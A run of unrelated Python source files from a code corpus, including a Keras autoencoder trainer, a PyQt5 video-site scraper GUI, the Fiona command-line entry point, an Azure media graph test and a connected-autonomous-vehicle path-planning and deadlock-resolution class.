            self.mgm = ModelMGPU(self.aen,gpus=self.ngpu)
            self.mgm.compile(optimizer=opt, loss='binary_crossentropy',metrics=['acc',jaccard,dice_loss])
        else:
            self.aen.compile(optimizer=opt, loss='binary_crossentropy',metrics=['acc',jaccard,dice_loss])
            self.mgm = None
    def aeTrain(self,trn,fn,vb=0,mdelta=0.0002,esp=10,EPO=None):
        """Train the autoencoder on *trn* (input == target).

        Checkpoints the best weights to data/<fn>.hdf5, logs to logs/<fn>,
        applies LR reduction and early stopping, and reloads the best
        weights afterwards.  Returns (checkpoint_path, log_dir).
        """
        if EPO is None:
            epo = self.EPO
        else:
            epo = EPO
        bat=self.batch
        modsave = f'data/{fn}.hdf5'
        chkptr = ModelCheckpoint(filepath = modsave, verbose = 0, save_best_only = True)
        rlr = ReduceLROnPlateau(monitor = 'val_loss', factor = 0.2, patience = 2, min_lr = 0.000001)
        lgd = f'logs/{fn}'
        tb = TensorBoard(log_dir=lgd)
        estp = EarlyStopping(patience=esp,restore_best_weights=True,min_delta=mdelta)
        cblist=[chkptr,estp,tb,rlr]
        if self.mgm is None:
            self.aen.fit(trn, trn, shuffle = True, epochs = epo, batch_size = bat,
                         callbacks = cblist, validation_split = 0.2,verbose=vb)
            self.aen.load_weights(modsave)
        else:
            self.mgm.fit(trn, trn, shuffle = True, epochs = epo, batch_size = bat,
                         callbacks = cblist, validation_split = 0.2,verbose=vb)
            self.mgm.load_weights(modsave)
        return modsave,lgd
    def loadw(self,modsave):
        """Load previously saved weights into the active model."""
        if self.mgm is None:
            self.aen.load_weights(modsave)
        else:
            self.mgm.load_weights(modsave)
    def evaluate(self,x):
        """Evaluate reconstruction metrics of *x* against itself."""
        if self.mgm is None:
            sc = self.aen.evaluate(x,x)
        else:
            sc = self.mgm.evaluate(x,x)
        return sc #0 -> loss
def plotm(model):
    """Render a Keras model graph inline (Jupyter) as SVG."""
    display(SVG(model_to_dot(model,show_shapes=True).create(prog='dot', format='svg')))
def getFileList(mypath):
    """Return the names of the regular files directly inside *mypath*
    (subdirectories are excluded)."""
    return [entry for entry in listdir(mypath) if isfile(join(mypath, entry))]
def tbHistoryPlot(lgd):
    """Plot training/validation loss curves from a TensorBoard log dir *lgd*."""
    fn = getFileList(lgd)
    # NOTE(review): listdir order is arbitrary; [-1] picks an unspecified
    # event file when several exist — confirm this selects the intended run.
    fn = fn[-1]
    eacc = EventAccumulator(lgd+'/'+fn)
    eacc.Reload()
    tj = eacc.Scalars('loss')
    vj = eacc.Scalars('val_loss')
    steps = len(tj)
    x = np.arange(steps)
    y = np.zeros([steps, 2])
    for i in range(steps):
        y[i, 0] = tj[i][2] # value
        y[i, 1] = vj[i][2]
    plt.plot(x, y[:,0], label='training loss')
    plt.plot(x, y[:,1], label='validation loss')
    plt.xlabel("Steps")
    plt.ylabel("Loss")
    plt.title("Re-Training Progress")
    plt.legend(loc='upper right', frameon=True)
    plt.show()
#%%
# Library module: nothing to run when executed directly.
if __name__ == "__main__":
    pass
| StarcoderdataPython |
9784175 | from PyQt5.QtWidgets import (QMainWindow, QWidget, QHBoxLayout, QVBoxLayout, QGridLayout, QLabel,
QScrollArea)
from PyQt5.QtGui import (QPixmap, QImage)
from PyQt5.QtCore import Qt
from bs4 import BeautifulSoup
import requests
import urllib.request
from urllib.request import Request
import functools
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
from mainVideo import MainVideo
from getVideo import GetVideo
from searchBar import SearchBar
class MainWindow(QMainWindow):
    """Main application window: search bar on top, scrollable grid of
    video thumbnails below; clicking a thumbnail opens the video player."""
    def __init__(self):
        super().__init__()
        # Base site URL prepended to scraped relative links; empty by default.
        self.base_url = ""
        self.init_ui()
    def init_ui(self):
        """Dock the search bar and build the initial result grid."""
        searchBar = SearchBar()
        self.addDockWidget(Qt.TopDockWidgetArea, searchBar)
        searchBar.search.connect(self.searchText)
        self.gridLayout = self.gridResult()
    '''
    VideoWindow: This function takes in video url and image index to get the video.
    Note:
        source_object = label ==> is not used by the function right now.
    '''
    def videoWindow(self, event, source_object=None, video=None, index=None):
        """Open the player for the thumbnail at *index*, resolving and
        caching the stream URL on first click."""
        print("Clicked, from", source_object, video, "Index: ", index)
        # # self.getVideo(video)
        if self.cacheLinks[index] == "":
            # First click: scrape the page for the actual stream URL.
            videoUrl = GetVideo()
            url = videoUrl.getVideoLink(video)
            self.cacheLinks[index] = url
            # print(url)
        else:
            # Cached from a previous click on the same thumbnail.
            url = self.cacheLinks[index]
        print(url)
        self.mainVideo = MainVideo(self.base_url + url)
    def getVideo(self, url):
        """Fetch *url* with headless Chrome and hand the rendered HTML to
        getVideoLink.  (Alternative path; currently unused — see videoWindow.)"""
        # All Working in here ----------------------
        options = Options()
        options.add_argument("headless")
        caps = DesiredCapabilities().CHROME
        # "none" returns control before the page finishes loading.
        caps["pageLoadStrategy"] = "none"
        chrome_path = r"./driver/chromedriver"
        driver = webdriver.Chrome(chrome_path, chrome_options=options)
        driver.get(url)
        html = driver.page_source # driver.find_element_by_tag_name("html")
        # html = driver.find_element_by_id("player_el")
        driver.close()
        print(type(html))
        # print((html))
        # print(html.get_attribute("innerHTML"))
        # print(html.get_attribute("outerHTML"))
        self.getVideoLink(html)
        # print(self.base_url + videoLink["src"])
        # self.mainVideo = MainVideo(self.base_url + videoLink["src"])
        # print(driver.current_url)
    def getVideoLink(self, html):
        """Extract the player element's src attribute from rendered *html*
        and print it."""
        source = BeautifulSoup(html, "lxml")
        # source = BeautifulSoup(html, "html.parser")
        videoLink = source.find(id="player_el")
        print(type(videoLink))
        print(videoLink["src"])
    def searchText(self, text):
        """Slot for the search bar: rebuild the grid for the query *text*."""
        if text != "":
            # Site uses hyphen-joined search terms in the URL path.
            self.gridResult(self.base_url + "/" + "-".join(text.split()) + ".html")
            # self.update()
    def gridResult(self, url=None):
        """Scrape *url* (default: base_url) for thumbnails and titles and lay
        them out in a 3-column scrollable grid; returns the grid layout."""
        if url is None:
            url = self.base_url
        source = requests.get(url).text
        html = BeautifulSoup(source, "lxml")
        # print("Source type: ", type(source))
        # print("HTML type: ", type(html))
        # print(html.prettify())
        links = html.select("div.post_text + a")
        titles = html.select("div.post_text")
        videoLinks = []
        imageLinks = []
        ''' Index to keep track of which image was clicked on. '''
        index = 0
        '''
        Create an empty array to store the links of the visited video.
        '''
        self.cacheLinks = []
        '''
        Initialize 36 empty string to the cachelinks array.
        To check if the link is present in that particular index.
        '''
        # NOTE(review): assumes at most 36 results per page — confirm.
        for i in range(36):
            self.cacheLinks.append("")
        '''
        Iterate over the links to get the image source and the page source of the video.
        '''
        for link in links:
            if link.img is not None:
                img = "http:" + link.img['src'] # Get the image source
                url = Request(img)
                data = urllib.request.urlopen(url).read()
                image = QImage()
                image.loadFromData(data)
                container = QVBoxLayout()
                label1 = QLabel()
                label2 = QLabel(titles[index].text)
                # label1.setText("Hello")
                label1.setPixmap(QPixmap(image).scaled(200, 150, Qt.KeepAspectRatio))
                label1.setScaledContents(True)
                label1.setStyleSheet("border: 1px solid black")
                # functools.partial binds this thumbnail's link/index to the
                # click handler (a plain lambda would late-bind the loop vars).
                label1.mousePressEvent = functools.partial(self.videoWindow, source_object=label1,
                                                           video=self.base_url + link['href'], index=index)
                print(label2.text())
                label1.setMaximumWidth(320)
                label1.setMaximumHeight(200)
                label2.setMaximumWidth(230)
                label2.setMaximumHeight(15)
                container.addWidget(label2)
                container.addWidget(label1)
                videoLinks.append(self.base_url + link['href'])
                '''
                Append all the data to attach to the GridLayout.
                '''
                imageLinks.append(container)
                # imageLinks.append(label1)
                index += 1
        '''
        Put all the images in the Grid Layout.
        Click the image to pop up the video playing window.
        '''
        a = 1
        r = 0
        c = 0
        gridLayout = QGridLayout()
        for x in imageLinks:
            if a < 3:
                a += 1
            else:
                a = 1
            gridLayout.addLayout(x, r, c)
            # gridLayout.addWidget(x, r, c)
            c += 1
            if c == 3:
                # Wrap to the next row after three columns.
                c = 0
                r += 1
        scrollArea = QScrollArea()
        scrollChildArea = QWidget()
        scrollChildArea.setLayout(gridLayout)
        scrollArea.setWidgetResizable(True)
        scrollArea.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
        scrollArea.setVerticalScrollBarPolicy(Qt.ScrollBarAlwaysOn)
        scrollArea.setMinimumHeight(600)
        scrollArea.setMaximumHeight(600)
        scrollArea.setWidget(scrollChildArea)
        # scrollArea.setFrameShape(QFrame().NoFrame)
        scrollArea.setStatusTip("Preview")
        # """ Get the image from the given URL """
        # # Set argument headers={"User-Agent": "Mozilla/5.0"} to cheat the spider/bot agent
        # url = Request('http://s17.trafficdeposit.com/blog/img/5aeb0d1c0a832/5c77e2cdecca0/0.jpg')
        # data = urllib.request.urlopen(url).read()
        #
        # image = QImage()
        # image.loadFromData(data)
        self.setCentralWidget(scrollArea)
        self.setWindowTitle("Testing")
        self.resize(800, 600)
        self.show()
        return gridLayout
3219271 | from .athletes import AthleteViewSet
from .competitions import CompetitionViewSet
from .lifts import LiftViewSet
from .sessions import SessionViewSet
| StarcoderdataPython |
# Print the numbers 0 through 9, each followed by " saga".
for number in range(10):
    print(number, " saga")
8183266 | # Copyright 2021 The IREE Authors
#
# Licensed under the Apache License v2.0 with LLVM Exceptions.
# See https://llvm.org/LICENSE.txt for license information.
# SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception
"""Constants that are inlined into RTL modules."""
# TypeCode constants. These are mirrored from the BuiltinTypeCode enum on the
# C++ side (and must match or chaos will ensue).
# Sentinel and container types.
TYPE_NONE = 1
TYPE_TUPLE = 2
TYPE_LIST = 3
# Text and binary data.
TYPE_STR = 4
TYPE_BYTES = 5
# Error/result marker and the metatype.
TYPE_EXCEPTION_RESULT = 6
TYPE_TYPE = 7
# Numeric scalar types.
TYPE_BOOL = 8
TYPE_INTEGER = 9
TYPE_REAL = 0xa
TYPE_COMPLEX = 0xb
# Object references sit in a separate, higher range (presumably to leave
# room for further builtin codes — confirm against the C++ enum).
TYPE_OBJECT = 0x100
| StarcoderdataPython |
from math import *
my_num = 3
print(160 * 4.9)
print(10 % 3)
print(abs(my_num))  # absolute value
print(pow(10, 4))  # exponentiation
print(max(1, 3, 4, 5, 5, 6, 7, 8, ))  # largest value; min() is the opposite
print(round(4.5233))  # rounding to the nearest integer
print(ceil(4.4))  # round up to the next integer
print(sqrt(130))  # square root of a number
print(floor(2.3))  # round down to the previous integer
print(type(4.5))  # shows the data type
print(type(my_num))  # shows the data type
print(str(my_num) + " is my fav number ")  # with str(): string concatenation works
print(my_num + " is my fav number ")  # without str() — deliberate error: raises TypeError (int + str)
153016 | <gh_stars>100-1000
"""
Main click group for the CLI. Needs to be isolated for entry-point loading.
"""
import logging
from pkg_resources import iter_entry_points
import sys
import click
from click_plugins import with_plugins
from cligj import verbose_opt, quiet_opt
import fiona
from fiona import __version__ as fio_version
from fiona.session import AWSSession, DummySession
def configure_logging(verbosity):
    """Configure root logging to stderr; each verbosity step lowers the level by 10, floored at 10 (DEBUG)."""
    level = max(10, 30 - 10 * verbosity)
    logging.basicConfig(stream=sys.stderr, level=level)
# Register both command and plugin entry points as subcommands of this group.
@with_plugins(ep for ep in list(iter_entry_points('fiona.fio_commands')) +
              list(iter_entry_points('fiona.fio_plugins')))
@click.group()
@verbose_opt
@quiet_opt
@click.option(
    "--aws-profile",
    help="Select a profile from the AWS credentials file")
@click.option(
    "--aws-no-sign-requests",
    is_flag=True,
    help="Make requests anonymously")
@click.option(
    "--aws-requester-pays",
    is_flag=True,
    help="Requester pays data transfer costs")
@click.version_option(fio_version)
@click.version_option(fiona.__gdal_version__, '--gdal-version',
                      prog_name='GDAL')
@click.version_option(sys.version, '--python-version', prog_name='Python')
@click.pass_context
def main_group(
        ctx, verbose, quiet, aws_profile, aws_no_sign_requests,
        aws_requester_pays):
    """Fiona command line interface.
    """
    # Net verbosity: each -v adds one, each -q subtracts one.
    verbosity = verbose - quiet
    configure_logging(verbosity)
    # Share state with subcommands via the click context object.
    ctx.obj = {}
    ctx.obj["verbosity"] = verbosity
    ctx.obj["aws_profile"] = aws_profile
    # Enable GDAL's CPL_DEBUG output only at -vvv and above.
    envopts = {"CPL_DEBUG": (verbosity > 2)}
    # Build a real AWS session only when explicitly requested; otherwise a no-op session.
    if aws_profile or aws_no_sign_requests:
        session = AWSSession(
            profile_name=aws_profile,
            aws_unsigned=aws_no_sign_requests,
            requester_pays=aws_requester_pays,
        )
    else:
        session = DummySession()
    ctx.obj["env"] = fiona.Env(session=session, **envopts)
| StarcoderdataPython |
11263890 | import pytest
from azure.media.analyticsedge import *
class TestGraphBuildSerialize():
    """Builds a media graph topology (RTSP source -> asset sink) and checks it serializes."""
    def test_build_graph_serialize(self):
        graph_topology_name = "graphTopology1"
        graph_properties = MediaGraphTopologyProperties()
        graph_properties.description = "Continuous video recording to an Azure Media Services Asset"
        # Topology parameters, referenced below via ${...} placeholders.
        user_name_param = MediaGraphParameterDeclaration(name="rtspUserName",type="String",default="dummyusername")
        password_param = MediaGraphParameterDeclaration(name="rtspPassword",type="String",default="<PASSWORD>")
        url_param = MediaGraphParameterDeclaration(name="rtspUrl",type="String",default="rtsp://www.sample.com")
        # RTSP source node; credentials are resolved from the parameters at deploy time.
        source = MediaGraphRtspSource(name="rtspSource", endpoint=MediaGraphUnsecuredEndpoint(url="${rtspUrl}",credentials=MediaGraphUsernamePasswordCredentials(username="${rtspUserName}",password="${rt<PASSWORD>}")))
        node = MediaGraphNodeInput(node_name="rtspSource")
        # Asset sink consuming the RTSP node, writing 30-second segments with a 2 GiB local cache.
        sink = MediaGraphAssetSink(name="assetsink", inputs=[node],asset_name_pattern='sampleAsset-${System.GraphTopologyName}-${System.GraphInstanceName}', segment_length="PT0H0M30S",local_media_cache_maximum_size_mi_b=2048,local_media_cache_path="/var/lib/azuremediaservices/tmp/")
        graph_properties.parameters = [user_name_param, password_param, url_param]
        graph_properties.sources = [source]
        graph_properties.sinks = [sink]
        graph = MediaGraphTopology(name=graph_topology_name,properties=graph_properties)
        set_graph_method = MediaGraphTopologySetRequest(graph=graph)
        set_graph_method_serialize = set_graph_method.serialize()
        # The serialized request must carry the topology name through unchanged.
        assert set_graph_method_serialize['name'] == graph_topology_name
9743629 | from .trace_decorator import trace
from .trace import Trace
| StarcoderdataPython |
240638 | <filename>voice2vec/data/__init__.py
from .spectograms import get_spectrogram
from .voices_data import VoicesData
| StarcoderdataPython |
374334 | <filename>CAV.py
# <NAME>|| AUM NAMAH SHIVAAYA||
# Connected Autonomous Vehicle (CAV) model class file
import numpy as np
import config
from utils import dist, contiguous, objStr
from numpy.random import poisson
from threading import Thread
class CAV:
    """
    Connected Autonomous Vehicle. Plans a shortest path over the shared
    waypoint graph (config.WPs), exchanges future paths and partial
    dependency graphs with peers via the simulated channel (config.S),
    and drives itself with a simple motion planner/controller.
    Positions are metres (comments mark cm where used); timestamps are
    microseconds unless a comment says otherwise.
    """
    iter = None # iteration number
    ID, timestamp = None, 0 # microseconds (will later set to a random positive number)
    logFile, trajFile, trajFileJson = None, None, None # log and trajectory
    cont_end = 0 # microseconds ### @USELESS ###
    # Graph Related Members
    lookAhead, dest = None, None
    nbWts = None # similar to graph["neighbours"], but weights get updated in each iteration ### @USELESS ###
    SP = None # waypoints indices
    FP = None # granula (FP) indices
    fpStartTs = None
    CZ = None # Conflict Zones (will be dictionary with CAV IDs as keys)
    PDG = None # Partial Dependency Graph
    carIndices = None # dictionary
    CDG = None # Complete Dependency Graph
    # Dynamics Related Members
    x, y = None, None # m
    phi, psi = None, None # heading and steering angle (radians)
    v, v_max, v_safe = None, None, None # m/s
    a_brake = None # m/s2
    a, a_max = None, None # m/s2
    lastMcTs = None # us
    Others_Info, Others_PDG = None, None # will be dictionary with CAV IDs as keys
    def __init__(self, car):
        """ Initialization aka `Booting` """
        self.nbWts = config.NBs
        self.iter = 0
        self.ID = car["id"]
        self.dest = car["dest"]
        self.x, self.y = (car["x"]/100), (car["y"]/100) # LHS is metres
        # Snap the look-ahead to the waypoint closest to the spawn position.
        closest_dist, l_WPs = float('inf'), len(config.WPs)
        for i in range(l_WPs):
            d = dist({ "x" : (self.x * 100), "y" : (self.y * 100) }, config.WPs[i])
            if d < closest_dist:
                self.lookAhead = i
                closest_dist = d
        self.find_shortest_path() # computes `self.SP` from `self.lookAhead` and `self.dest`
        self.v, self.a, self.phi, self.psi = 0, 0, car["angle"], 0
        self.v_max, self.a_max, self.a_brake = car["speed"], car["acc"], car["accBrake"]
        # Randomized boot time models unsynchronized startup across vehicles.
        self.timestamp = self.lastMcTs = poisson(config.poi_avg["boot_time"])
        self.thread = Thread(target = self.execute)
        self.logFile = open(f"./logFiles/CAV_{self.ID}.txt", "w")
        self.logFile.write(f"ID = {self.ID}, Boot Time = {self.timestamp}\n")
        self.logFile.write(f"{self.__str__()}\n")
        self.trajFile = open(f"./logFiles/CAV_{self.ID}_traj.csv", "w")
        self.trajFile.write(f"ts(ms),x(cm),y(cm),phi(degrees),v(m/s),lookAhead,lookAheadX(cm),lookAheadY(cm)\n")
        self.trajFileJson = open(f"./logFiles/CAV_{self.ID}_traj.json", "w")
        self.trajFileJson.write(f"[")
    def __del__(self):
        """ Destructor: closes log/trajectory files and terminates the JSON array. """
        if self.logFile and not self.logFile.closed:
            self.logFile.write("\nExiting...\n")
            self.logFile.close()
        if self.trajFile and not self.trajFile.closed:
            self.trajFile.close()
        if self.trajFileJson and not self.trajFileJson.closed:
            self.trajFileJson.write("\n]")
            self.trajFileJson.close()
    def __str__(self):
        """ Stringification """
        ts = "%.3f" % (self.timestamp / 1000)
        dest = config.WPs[self.dest]
        lookAhead = config.WPs[self.lookAhead]
        retStr = f"CAV : ID = {self.ID}, Timestamp = {ts} ms\n"
        retStr += f"Look Ahead WP = {self.lookAhead} ({round(lookAhead['x']/100, 3)} m, {round(lookAhead['y']/100, 3)} m), "
        retStr += f"Destination WP = {self.dest} ({round(dest['x']/100, 3)} m, {round(dest['y']/100, 3)} m)\n"
        retStr += f"fpStartTs = {self.fpStartTs}\n"
        retStr += f"lastMcTs = {self.lastMcTs}\n"
        retStr += f"Position = ({self.x} m, {self.y} m), Angle (phi) = {self.phi} rad\n"
        retStr += f"v = {self.v} m/s, v_max = {self.v_max} m/s, a_brake = {self.a_brake} m/s2\n"
        retStr += f"Shortest Path = {self.SP}\n"
        return retStr
    ######## GRAPH ALGORITHMS' STUFF ########
    #########################################
    def hasReachedDest(self):
        """ Return whether destination has been reached. Takes negligible time. """
        # Dead-reckon the current position from the last motion-control update.
        dt = self.timestamp - self.lastMcTs # us
        curr_x = (100 * self.x) + ((self.v * np.cos(self.phi) * dt) / (10**4)) # cm
        curr_y = (100 * self.y) + ((self.v * np.sin(self.phi) * dt) / (10**4)) # cm
        return dist({ "x" : curr_x, "y" : curr_y }, config.WPs[self.dest]) <= (config.DEST_REACH_THRESHOLD * 100)
    def find_shortest_path(self):
        """
        [Slow] Dijkstra Algorithm for Shortest Path between `self.lookAhead` and `self.dest`
        Output in `self.SP` (consists only of waypoints's indices in config.WPs). Used only once for now.
        """
        l_WPs = len(config.WPs)
        cost = [float('inf') for i in range(l_WPs)] # costs are in time (milliseconds)
        parent = [None for i in range(l_WPs)] # parents
        cost[self.lookAhead] = 0 # cost from source = 0
        Q = [i for i in range(l_WPs)] # all vertices in Min-Priority Queue (TODO: MAKE THIS EFFICIENT)
        while len(Q) > 0:
            min_q_idx = np.array([cost[u] for u in Q]).argmin() # get vertex with smallest distance (TODO: MAKE THIS EFFICIENT)
            u = Q[min_q_idx]
            del Q[min_q_idx]
            for nb in self.nbWts[u]:
                v, wt = nb["idx"], nb["wt"]
                if v in Q:
                    alt = cost[u] + wt
                    if alt < cost[v]:
                        cost[v] = alt
                        parent[v] = u
        # Walk the parent chain back from the destination, then reverse it.
        sp = [self.dest] # list of vertices
        while parent[sp[-1]] != None:
            sp.append(parent[sp[-1]])
        sp.reverse()
        self.SP = sp # consists of waypoints (indices in config.WPs)
    def compute_future_path(self):
        """ Computing Future Path (made of granulae, which include CAV's current position) """
        # self.find_shortest_path() # self.SP gets updated
        # no need to recompute `self.SP`. Simply make `SP` = `self.SP`[`self.lookAhead` ...]
        SP = self.SP[ self.SP.index(self.lookAhead) : ] # takes poisson(config.poi_avg["sp_time"]) time
        self.timestamp += poisson(config.poi_avg["compute_future_path_1"])
        self.fpStartTs = self.timestamp # TS as which FP start position is recorded. used in computing TOA in CZ
        dt = self.timestamp - self.lastMcTs # us
        curr_x = (100 * self.x) + (self.v * np.cos(self.phi) * dt / (10**4)) # cm
        curr_y = (100 * self.y) + (self.v * np.sin(self.phi) * dt / (10**4)) # cm
        # must add self position if not close enough to SP[0] (aka self.lookAhead)
        mustAddSelf = dist({ "x" : curr_x, "y" : curr_y }, config.WPs[SP[0]]) >= config.FP_INCLUSION_THRESHOLD
        # Planning horizon: worst-case stopping distance at v_max (reaction + braking), metres.
        d_max = self.v_max * ((config.rho/1000) + (self.v_max/np.abs(self.a_brake)))
        l_sp = len(SP)
        fp, total_dist = [], 0.0 # future points, total distance (cm) covered by these future points
        for i in range(0 if mustAddSelf else 1 , l_sp):
            rem = (100.0 * d_max) - total_dist # remaining distance (cm)
            e_start = config.WPs[SP[i-1]] if (i > 0) else { "x" : curr_x, "y" : curr_y } # starting waypoint of edge
            e_end = config.WPs[SP[i]] # ending waypoint of edge
            d = dist(e_start, e_end) # edge length (cm)
            num_fp = np.ceil(np.min([rem, d]) / (config.b * 100))
            for j in range(int(num_fp)):
                # Granule j is a linear interpolation along the edge, spaced config.b metres apart.
                fp.append({
                    "x" : ( (d-100*j*config.b)*e_start["x"] + 100*j*config.b*e_end["x"] ) / d,
                    "y" : ( (d-100*j*config.b)*e_start["y"] + 100*j*config.b*e_end["y"] ) / d,
                    "e_start" : SP[i-1] if (i > 0) else None, "e_end" : SP[i] # indicates the edge these granulae come from
                })
            if (rem <= d): break
            if i == (l_sp-1):
                # Last edge of the path: also include its end waypoint as a granule.
                fp.append({
                    "x" : e_end["x"], "y" : e_end["y"],
                    "e_start" : SP[i-1] if (i > 0) else None, "e_end" : SP[i] # indicates the edge these granulae come from
                })
                break
            total_dist += d
        self.FP = fp # FP consists of granulae (xy coordinates)
        self.timestamp += poisson(config.poi_avg["compute_future_path_2"])
        self.logFile.write(f"\nAPPARENT SHORTEST PATH\n{SP}\n")
        self.logFile.write(f"\nFUTURE PATH\n{objStr(self.FP)}\n")
    def find_conflict_zones_all_CAVs(self):
        """ Recompute self.carIndices, self.CZ and self.PDG against every known peer. """
        # first compute self.carIndices
        self.carIndices = {}
        IDs = [self.ID]
        for other_cav_id in self.Others_Info:
            IDs.append(other_cav_id)
        IDs.sort()
        l_IDs = len(IDs)
        for i in range(l_IDs):
            self.carIndices[IDs[i]] = i
        self.PDG = np.zeros((l_IDs, l_IDs)) # lower ID gets lower index (as indicated by above computation)
        self.CZ = {} # empty previous results
        for other_cav_id in self.Others_Info:
            self.find_conflict_zones(other_cav_id)
        self.timestamp += poisson(config.poi_avg["find_conflict_zones"]) # placed here because we require deterministic timing
        self.logFile.write(f"\nCONFLICT ZONES\n{objStr(self.CZ)}\n")
        self.logFile.write(f"\nPDG\n{self.PDG}\n")
    def find_conflict_zones(self, other_cav_id):
        """
        Find conflict zones between future paths (consists of granulae and associated
        edges) `self.FP` and `other.FP`. Also make Partial Dependency Graph (PDG) in parallel.
        """
        other = self.Others_Info[other_cav_id]
        v_other, fp_other = other["v"], other["FP"]
        l_fp, l_fp_other = len(self.FP), len(fp_other)
        mp, mp_other = [], [] # edge midpoints (mp[i] is midpoint of fp[i] and fp[i+1])
        for i in range(1, l_fp):
            tstart, tend = self.FP[i-1], self.FP[i]
            mp.append({ "x" : (tstart["x"] + tend["x"]) / 2, "y" : (tstart["y"] + tend["y"]) / 2 })
        for i in range(1, l_fp_other):
            tstart, tend = fp_other[i-1], fp_other[i]
            mp_other.append({ "x" : (tstart["x"] + tend["x"]) / 2, "y" : (tstart["y"] + tend["y"]) / 2 })
        # calculate conflicting pairs first
        C = []
        for i in range(l_fp-1):
            for j in range(l_fp_other-1):
                if dist(mp[i], mp_other[j]) < (config.d_th * 100): # LHS is in cm
                    C.append({ "self" : [i], "other" : [j] })
        # merge conflicting pairs into conflicting zones (caution: C is a variable length array now)
        curr = 0
        while True:
            if curr >= (len(C)-1):
                break
            k = curr + 1
            while True:
                if k >= len(C):
                    curr += 1
                    break
                combinedZone = contiguous(zone = C[curr], pair = C[k])
                if combinedZone == None:
                    k += 1
                    continue
                C[curr] = combinedZone
                del C[k] # no need to increment k after this deletion
        l_C = len(C)
        for i in range(l_C):
            # Convert each merged zone into begin/end arc-lengths along both paths (cm).
            v1, d1_begin, d1_end = C[i]["self"], 0, 0 # d1_begin, d1_end in cm
            p, q, special = v1[0], v1[-1], (len(v1) <= 1)
            for k in range(p):
                d1_begin += dist(self.FP[k], self.FP[k+1])
            d1_end = d1_begin
            for k in range(p, q):
                d1_end += dist(self.FP[k], self.FP[k+1])
            d1_begin += 0 if special else (0.5 * dist(self.FP[p], self.FP[p+1]))
            d1_end += (1 if special else 0.5) * dist(self.FP[q], self.FP[q+1])
            v1 = [p, p+1] if special else v1[1:]
            v2, d2_begin, d2_end = C[i]["other"], 0, 0 # d2_begin, d2_end in cm
            p, q, special = v2[0], v2[-1], (len(v2) <= 1)
            for k in range(p):
                d2_begin += dist(fp_other[k], fp_other[k+1])
            d2_end = d2_begin
            for k in range(p, q):
                d2_end += dist(fp_other[k], fp_other[k+1])
            d2_begin += 0 if special else (0.5 * dist(fp_other[p], fp_other[p+1]))
            d2_end += (1 if special else 0.5) * dist(fp_other[q], fp_other[q+1])
            v2 = [p, p+1] if special else v2[1:]
            # Times of Arrival (microseconds)
            toa1 = (self.fpStartTs + (10000*d1_begin/(self.v if (self.v != 0) else self.v_max)))
            toa2 = (other["fpStartTs"] + (10000*d2_begin/(v_other if (v_other != 0) else (other["v_max"]))))
            # Earlier arrival wins the zone; ties within clock accuracy go to the lower ID.
            diff, adv = (toa2-toa1), None
            if np.abs(diff) <= config.CLOCK_ACCURACY:
                adv = self.ID if (self.ID < other_cav_id) else other_cav_id
            else:
                adv = self.ID if (diff > 0) else other_cav_id
            C[i] = { # "cz" is array of indices in self.FP/other.FP, `begin` and `end` are in cm
                "self" : { "begin" : (d1_begin/100), "end" : (d1_end/100), "toa" : toa1, "cz" : v1 },
                "other" : { "begin" : (d2_begin/100), "end" : (d2_end/100), "toa" : toa2, "cz" : v2 },
                "advantage" : adv
            }
        self.CZ[other_cav_id] = C
        if l_C > 0: # for now considering only C[0] for PDG
            rowIndex, colIndex = self.carIndices[self.ID], self.carIndices[other_cav_id] # self.ID yields to other_cav_id
            if C[0]["advantage"] == self.ID: rowIndex, colIndex = colIndex, rowIndex # other_cav_id yields to self.ID
            self.PDG[rowIndex][colIndex] = 1
    def construct_CDG(self):
        """ Construct CDG from `self.PDG` and `self.Others_PDG` and store it in `self.CDG` """
        l_carIndices = len(self.carIndices)
        self.CDG = np.zeros((l_carIndices, l_carIndices)) # lower index for lower ID
        # CDG is the element-wise OR of our PDG and every peer's PDG.
        self.CDG = np.logical_or(self.CDG, self.PDG)
        for PDG in self.Others_PDG:
            self.CDG = np.logical_or(self.CDG, self.Others_PDG[PDG])
        self.timestamp += poisson(config.poi_avg["construct_CDG"])
        self.logFile.write(f"\nCDG\n{self.CDG}\n")
    def DFS(self, CDG, visited, parent, start, n):
        """ Depth First Search (DFS) to detect only ONE cycle """
        visited[start] = -1
        cycle = []
        # flag = 0
        for i in range(n):
            if CDG[start][i] == True:
                if visited[i] == 0:
                    parent[i] = start
                    cycle = self.DFS(CDG, visited, parent, i, n)
                    if cycle != []: return cycle
                elif visited[i] == -1: # cycle detected
                    # Unwind the parent chain from `start` back to `i` to recover the cycle.
                    j = start
                    while(parent[j]!=i):
                        cycle.append(j)
                        j = parent[j]
                    cycle.append(j)
                    cycle.append(i)
                    return cycle
        visited[start] = 1
        return cycle
    def findCycles(self, CDG):
        """ Finding cycle: Function is expected to find exactly one cycle and return the nodes involved in the cycle """
        n = np.array(CDG).shape[0]
        visited, parent = np.zeros(n), np.arange(n)
        # NOTE(review): int(n/n-1) == int(1.0 - 1) == 0 for every n, so this loop
        # body never executes and findCycles always returns []. Presumably
        # range(n) was intended — but see the note in ResolveDeadlock before
        # "fixing" it, since resolveCycle would then index an empty averaged_TOA.
        for start in range(int(n/n-1)):
            if visited[start] == 0:
                cycle = self.DFS(CDG, visited, parent, start, n)
                print("Cyle: ", cycle)
                if(cycle != []):
                    return cycle
        return []
    def resolveCycle(self, CDG, cycle, averagedTOA):
        """ Break one cycle: the vehicle with the smallest averaged TOA becomes leader and all its incoming edges are flipped. """
        min_time, leader = averagedTOA[cycle[0]], cycle[0]
        for vehicle in cycle:
            if averagedTOA[vehicle] < min_time: min_time, leader = averagedTOA[vehicle], vehicle
        n = CDG.shape[0]
        for i in range(n):
            if CDG[i][leader]: CDG[i][leader], CDG[leader][i] = False, True
        return CDG
    # NOTE(review): `averaged_TOA=[]` is a mutable default argument, and the sole
    # caller (deadlock_resolution) passes nothing — if findCycles ever returned a
    # non-empty cycle, resolveCycle would IndexError on the empty list. Consistent
    # with the "Will complete this later" note below; confirm intent before changing.
    def ResolveDeadlock(self, averaged_TOA=[]):
        cycles = self.findCycles(self.CDG)
        while cycles != []:
            self.resolveCycle(self.CDG, cycles, averaged_TOA)
            cycles = self.findCycles(self.CDG)
        return self.CDG
    def deadlock_resolution(self):
        """ Detect any deadlocks found in `self.CDG` and resolve them using DFS. Will complete this later. """
        self.ResolveDeadlock()
        self.timestamp += poisson(config.poi_avg["deadlock_resolution"])
